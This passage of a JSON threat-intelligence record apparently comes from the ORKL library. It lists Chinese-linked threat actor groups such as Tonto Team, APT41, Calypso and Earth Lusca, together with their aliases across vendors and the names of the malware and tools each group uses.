				"CactusPete",
				"KARMA PANDA",
				"BRONZE HUNTLEY",
				"Red Beifang"
			],
			"source_name": "MISPGALAXY:Tonto Team",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "da483338-e479-4d74-a6dd-1fb09343fd07",
			"created_at": "2022-10-25T15:50:23.698197Z",
			"updated_at": "2026-04-10T02:00:05.355597Z",
			"deleted_at": null,
			"main_name": "Tonto Team",
			"aliases": [
				"Tonto Team",
				"Earth Akhlut",
				"BRONZE HUNTLEY",
				"CactusPete",
				"Karma Panda"
			],
			"source_name": "MITRE:Tonto Team",
			"tools": [
				"Mimikatz",
				"Bisonal",
				"ShadowPad",
				"LaZagne",
				"NBTscan",
				"gsecdump"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "17d16126-35d7-4c59-88a5-0b48e755e80f",
			"created_at": "2025-08-07T02:03:24.622109Z",
			"updated_at": "2026-04-10T02:00:03.726126Z",
			"deleted_at": null,
			"main_name": "BRONZE HUNTLEY",
			"aliases": [
				"CactusPete ",
				"Earth Akhlut ",
				"Karma Panda ",
				"Red Beifang",
				"Tonto Team"
			],
			"source_name": "Secureworks:BRONZE HUNTLEY",
			"tools": [
				"Bisonal",
				"RatN",
				"Royal Road",
				"ShadowPad"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c39b0fe6-5642-4717-9a05-9e94265e3e3a",
			"created_at": "2022-10-25T16:07:24.332084Z",
			"updated_at": "2026-04-10T02:00:04.940672Z",
			"deleted_at": null,
			"main_name": "Tonto Team",
			"aliases": [
				"Bronze Huntley",
				"CactusPete",
				"Earth Akhlut",
				"G0131",
				"HartBeat",
				"Karma Panda",
				"LoneRanger",
				"Operation Bitter Biscuit",
				"TAG-74",
				"Tonto Team"
			],
			"source_name": "ETDA:Tonto Team",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Bioazih",
				"Bisonal",
				"CONIME",
				"Dexbia",
				"Korlia",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"POISONPLUG.SHADOW",
				"RoyalRoad",
				"ShadowPad Winnti",
				"XShellGhost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c5b0e7e-2388-4b63-9b97-6b027bec4bf7",
			"created_at": "2023-01-06T13:46:39.068694Z",
			"updated_at": "2026-04-10T02:00:03.202867Z",
			"deleted_at": null,
			"main_name": "Calypso",
			"aliases": [
				"BRONZE MEDLEY"
			],
			"source_name": "MISPGALAXY:Calypso",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8e385d36-06a2-4294-b3d3-01fe8e9d95f4",
			"created_at": "2022-10-25T16:07:24.219051Z",
			"updated_at": "2026-04-10T02:00:04.902017Z",
			"deleted_at": null,
			"main_name": "Space Pirates",
			"aliases": [
				"Erudite Mogwai",
				"Webworm"
			],
			"source_name": "ETDA:Space Pirates",
			"tools": [
				"9002 RAT",
				"Agent.dhwf",
				"AngryRebel",
				"BH_A006",
				"Chymine",
				"Darkmoon",
				"Deed RAT",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"Homux",
				"Hydraq",
				"Kaba",
				"Korplug",
				"McRAT",
				"MdmBot",
				"Moudour",
				"MyKLoadClient",
				"Mydoor",
				"PCRat",
				"PCShare",
				"POISONPLUG.SHADOW",
				"PlugX",
				"Poison Ivy",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SnappyBee",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Trochilus RAT",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "13d9c5fc-af82-4474-90dd-188c4e40a399",
			"created_at": "2022-10-25T16:07:23.435079Z",
			"updated_at": "2026-04-10T02:00:04.601572Z",
			"deleted_at": null,
			"main_name": "Calypso",
			"aliases": [
				"Bronze Medley"
			],
			"source_name": "ETDA:Calypso",
			"tools": [
				"Agent.dhwf",
				"Byeby",
				"Calypso RAT",
				"DCSync",
				"Destroy RAT",
				"DestroyRAT",
				"DoublePulsar",
				"EternalBlue",
				"EternalRomance",
				"FlyingDutchman",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"NBTscan",
				"OS_Check_445",
				"PlugX",
				"Quarks PwDump",
				"RedDelta",
				"SAMRID",
				"Sogu",
				"SysInternals",
				"TCP Port Scanner",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Whitebird",
				"Xamtrav",
				"ZXPortMap",
				"nbtscan",
				"netcat"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434159,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6a20cb5969a28df564f267d3604acaf0be156a18.pdf",
		"text": "https://archive.orkl.eu/6a20cb5969a28df564f267d3604acaf0be156a18.txt",
		"img": "https://archive.orkl.eu/6a20cb5969a28df564f267d3604acaf0be156a18.jpg"
	}
}